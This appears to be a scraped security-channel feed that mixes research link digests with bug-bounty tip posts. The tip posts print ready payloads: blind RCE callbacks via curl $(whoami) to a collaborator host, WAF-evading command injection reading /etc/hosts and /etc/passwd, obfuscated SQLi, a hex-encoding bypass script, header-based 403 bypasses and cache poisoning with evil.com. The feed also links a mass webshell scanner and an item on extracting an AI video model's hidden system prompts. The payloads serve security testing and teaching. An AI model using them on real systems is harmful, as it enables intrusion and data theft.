2777
🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️♂️ OSINT Specialist Admin: @laazy_hack3r
#tools
#cryptography
Critical cryptography vulnerabilities in the JavaScript elliptic library
https://blog.trailofbits.com/2025/11/18/we-found-cryptography-bugs-in-the-elliptic-library-using-wycheproof
// CVE-2024-48949, CVE-2024-48948 (unresolved)
See also:
]-> repository (updated) of test vectors of cryptographic libraries for known attacks
#AIOps
#MLSecOps
#RAG_Security
#Offensive_security
AI pentest scoping playbook
https://devansh.bearblog.dev/ai-pentest-scoping
// Scoping AI security engagements is harder than traditional pentests because the attack surface is larger, the risks are novel, and the methodologies are still maturing
#CogSec
#MLSecOps
Inside OpenAI Sora 2 -
Uncovering System Prompts Driving Multi-Modal LLMs
https://mindgard.ai/resources/openai-sora-system-prompts
// By chaining cross-modal prompts and clever framing, researchers surfaced hidden instructions from OpenAI’s video generator
#Research
"How Can We Effectively Use LLMs for Phishing Detection?: Evaluating the Effectiveness of Large Language Model-based Phishing Detection Models", 2025.
// This study investigates how to effectively leverage LLMs for phishing detection by examining the impact of input modalities (screenshots, logos, HTML, URLs), temperature settings, and prompt engineering strategies. We evaluate seven LLMs - two commercial models (GPT 4.1, Gemini 2.0 flash) and five open-source models (Qwen, Llama, Janus, DeepSeek-VL2, R1) - alongside two DL-based baselines (PhishIntention and Phishpedia). Our findings reveal that commercial LLMs generally outperform open-source models in phishing detection, while DL models demonstrate better performance on benign samples
#tools
#NetSec
#Research
"Multi Objective Optimization and AutoML based Intrusion Detection System", Nov. 2025.
]-> Repo
// In work, an innovative IDS utilizing Automated ML and Multi-Objective Optimization is proposed for autonomous and optimized attack detection in modern networking environments. The proposed IDS framework integrates two primary innovative techniques: Optimized Importance and Percentage-based Automated Feature Selection (OIP-AutoFS) and Optimized Performance, Confidence, and Efficiency-based Combined Algorithm Selection and Hyperparameter Optimization (OPCE-CASH)
#AppSec
#Whitepaper
#Threat_Research
"Comparative Analysis of Large Language Model Performance in Automated Threat Modeling: A WordPress Application Case Study", Aug. 2025.
]-> Repo
// This study investigates the use of LLMs as an assistant to conduct threat models of systems or apps. It researches the efficacy of a sample of modern LLMs against a constant system, a WordPress application deployed in Kubernetes. It compares the results based on four key metrics: threat coverage, completeness & depth of explanation, consistency, and false positive rate
#Analytics
#Threat_Research
An analytical review of the main cybersecurity events for the week (November 1-8, 2025)
1⃣ Breaking Down the Balancer v2 Hack
// The Balancer hack in 2025, caused by a longstanding rounding bug, highlights the need for rigorous math correctness, thorough testing, continuous security updates, and layered defenses in DeFi
]-> Analysis and guidance for DeFi ecosystem
2⃣ RDSEED Failure on AMD "Zen 5" Processors
// CVE-2025-62626. The RDSEED function for AMD’s Zen 5 processors does return 0 more often than it should...
3⃣ GTIG AI Threat Tracker: Advances in Threat Actor Usage of AI Tools
// Based on recent analysis of the broader threat landscape, Google Threat Intelligence Group has identified a shift that occurred within the last year: adversaries are no longer leveraging AI just for productivity gains, they are deploying novel AI-enabled malware in active ops
]-> a comprehensive guide to developing AI/ML systems is available on the channel
4⃣ Improvements to Open VSX Security
// In reference to the Glassworm incident, OpenVSX published a blog post outlining some of the security improvements they will make to prevent a repeat of this incident
5⃣ MS Teams Impersonation and Spoofing Vulnerabilities
// four vulnerabilities in MS Teams that allow attackers to impersonate executives, manipulate messages, alter notifications, and forge identities in video/audio calls. Both external guest users and malicious insiders could exploit these flaws
6⃣ The channel's most read publication in October
// Don’t Look Up: There Are Sensitive Internal Links in the Clear on GEO Satellites
]-> Analytical review (Oct.25 - Nov.1, 2025)
Het Hunter's,
DarkShadow here back again!
✅CRLF injection Explain🔥
This vulnerability allow an attacker to add there custom header on the responds! If you can inject \r\n.
⚡️Outdated but Helpful Some MySQL tricks to break some #WAFs out there. ⚔️ by @BRuteLogicSELECT-1e1FROM`test`
SELECT~1.FROM`test`
SELECT\NFROM`test`
SELECT@^1.FROM`test`
SELECT-id-1.FROM`test`
#infosec #cybersec #bugbountytips
🚨Multi-target unauthenticated RCE scanner for CVE-2025-34085 affecting WordPress Simple File List plugin. Uploads, renames, and triggers PHP webshells across large target sets.
✅https://github.com/ill-deed/CVE-2025-34085-Multi-target
Hey Hunter’s,
DarkShadow here back again!
☠️Blind Remote Code Execution🔥
✅POC: [Preferred format]
curl -X POST -d \"user=$(whoami)\" http://BURP_LINK"
Others format you might try:
curl whoami.BURP_LINK
curl $(whoami).BURP_LINK
some time targets might vulnerable but not give you the output. so never forget to try your burp collaborator to get the output.
NOTICE: always check User-Agent Header in your burp collaborator responds, if here you got curl means RCE.
Now you hit follow me for more: x.com/darkshadow2bd
Guys, I need ur review... I have created a ai to generate a vibe coding prompt.. And made it open sourced please do check and let me know the review..
https://github.com/Addy-shetty/Vibe-Prompting
Have one question... Do any here learning vibe coding...
Читать полностью…
#DevOps
#Tech_book
"Java Spring Bug Hunter's Secure Coding Playbook:
Java Spring Security with SAST Arsenal from Semgrep to Claude", 2025.
// Java Spring security in 2025 - a high-stakes game where a single misconfigured bean or an overlooked deserialization endpoint can become the gateway for sophisticated attackers...
#tools
#WLAN_Security
"Crowdsourcing Bluetooth identity, to understand Bluetooth vulnerability", DistrictCon 2025.
]-> Repo
]-> BlueTooth Information Data Exchange
]-> Blue2thprinting Code
// Disclaimer
#tools
#Mobile_Security
"A Comprehensive Study on Static Application Security Testing (SAST) Tools for Android", 2024.
]-> A Unified Platform for Evaluating SAST Tools for Android
// We propose a unified platform named VulsTotal, supporting various vulnerability types, enabling comprehensive and versatile analysis across diverse SAST tools. We also redefine and implement a standardized reporting format, ensuring uniformity in presenting results across all tools. Additionally, to mitigate the problem of benchmarks, we conducted a manual analysis of huge amounts of CVEs to construct a new CVE-based benchmark
#SCA
#tools
#cryptography
"Automated Side-Channel Analysis of Cryptographic Protocol Implementations", Nov. 2025.
]-> Automated Side-Channel Analysis of Cryptographic Protocols Implementations + PoC attack implementation
// Key contributions: (1) the first formal model of WhatsApp, extracted from its binary, (2) a framework to integrate side-channel leakage contracts into protocol models for the first time, (3) revealing critical vulnerabilities invisible to specification-based methods
#tools
#Cloud_Security
#Offensive_security
"Azure Pentest: Tools and Techniques", 2025.
#reversing
#MLSecOps
#Cyber_Education
"Reverse Engineering GPT", 2024.
https://github.com/mytechnotalent/RE-GPT
// Drawing inspiration from Andrej Karpathy’s iconic lecture, "Let’s Build GPT: From Scratch, in Code, Spelled Out", this project takes you on an immersive journey into the inner workings of GPT. Step-by-step, we’ll construct a GPT model from the ground up, demystifying its architecture and bringing its mechanics to life through hands-on coding
See also:
Neural Networks: Zero to Hero
#AIOps
#Fuzzing
#Offensive_security
"AI for AppSec and Offensive Security: From Automation to Autonomy", BSides Berlin, 2025.
]-> AI-powered workflow automation and AI Agents for AppSec, Fuzzing & Offensive Security
#AppSec
#Cloud_Security
1⃣ PoC for CVE-2025-49844, CVE-2025-46817 and CVE-2025-46818 Critical Lua Engine Vulnerabilities
https://redrays.io/blog/poc-for-cve-2025-49844-cve-2025-46817-and-cve-2025-46818-critical-lua-engine-vulnerabilities
// Three critical vulnerabilities in Redis 7.4.5
2⃣ Hunting for Bucket Traversals in Google's Client Libraries
https://jdomeracki.github.io/2025/05/04/hunting_for_bucket_traversals
// Bucket traversal to be an underresearched class of vulnerabilities, requiring significant context-specific knowledge for comprehensive understanding
✎ The perils of the “real” client IP & X-Forwarded-For Header
You've probably seen headers like these in common 403-bypass wordlists (e.g., my gist):
X-Forwarded-For: 127.0.0.1
X-Forwarded-Host: 127.0.0.1
X-Client-IP: 127.0.0.1
127.0.0.1, localhost, 192.168.1.1, internal IPs, etc.), but have you ever stopped to wonder why they sometimes actually work to bypass IP-based restrictions, rate limits, or 403/401 responses?X-Forwarded-For: 127.0.0.1
127.0.0.1, <real attacker IP>
🛡️ Bug Bounty Tip: Cloudflare 403 Bypass for Time-Based Blind SQLi
When your payload gets blocked by Cloudflare (403), try obfuscation with URL encoding to sneak it past!
❌ Blocked Payload
(select(0)from(select(sleep(10)))v) → 403 Forbidden
(select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%5C"%2B(select(0)from(select(sleep(6)))v)
Hey Hunter's,
DarkShadow here back again, dropping a really interesting bypass method!
❎WAF block: whoami
✅WAF bypass: $'\x77\x68\x6f\x61\x6d\x69'
✨Bash script:
#!/bin/bash
str="$1"
out=""
for ((i=0; i<${#str}; i++)); do
char="${str:i:1}"
ascii=$(printf '%d' "'$char")
hex=$(printf '%02x' "$ascii")
out="${out}\\x${hex}"
done
echo "$'$out'"
Hey Hunter's,
DarkShadow here back again, dropping some bypass methods that definitely help you.
Trying OS command injection, but WAF blocks every times?
❌ cat /etc/hosts
✅ tac /e\t\c/h\o\s\t\s
✅ tac${IFS}/e\t\c/h\o\s\t\s
✅ tac /e*c/h*st*
✅ tac /e{t,c}*/{o,h}*s*{s,t}
✅ tac /??c/??sts
Let me know guy's you all wants more or not like that?
Hey Hunter’s,
DarkShadow here back again, dropping another easiest way to get critical bugs!
If You Ever See Language Parameter, Then Never Forget to Test Expression-Language Injection Style Payload.
✅POC Payload:
1. Change the Method GET to POST
2. Language={${system("cat+/etc/passwd")}}
CACHE POISONING QUICK WIN:
Most apps validate X-Forwarded-Host as a single value.
But try this:
X-Forwarded-Host: http://legit.com, http://evil.com
• CDN: Reads first → Allows ✅
• App: Reads last → Injects
New bug bounty resource 🚀
The Cache Poisoning Bible - Part 1: Advanced Fundamentals
Everything I wish I knew when I started:
• Cache key architectures
• CDN comparison guide
• Advanced detection methods
• Real-world patterns
Aacle/the-cache-poisoning-bible-part-1-advanced-fundamentals-2c8e9d7be2e9" rel="nofollow">https://medium.com/@Aacle/the-cache-poisoning-bible-part-1-advanced-fundamentals-2c8e9d7be2e9
#DFIR
#AIOps
#MLSecOps
#RAG_Security
AI Incident Response Framework, V1.0
https://github.com/cosai-oasis/ws2-defenders/blob/main/incident-response/AI%20Incident%20Response.md
// This guides defenders on proactively minimizing the impact of AI system exploitation. It details how to maintain auditability, resiliency, and rapid recovery even when a system is compromised by advanced threat actors. Also explores the unique challenges of AI incident response, emphasizing the role of forensic investigation and the complications introduced by agentic architectures, while providing concrete steps to manage this new complexity
#exploit
"Exploiting the Impossible:
A Deep Dive into A Vulnerability Apple Deems Unexploitable", NullCon Berlin 2025.
]-> https://jhftss.github.io/Exploiting-the-Impossible
]-> PoC
// race condition in Apple core file-copy API (CVE-2024-54566, CVE-2025-43220)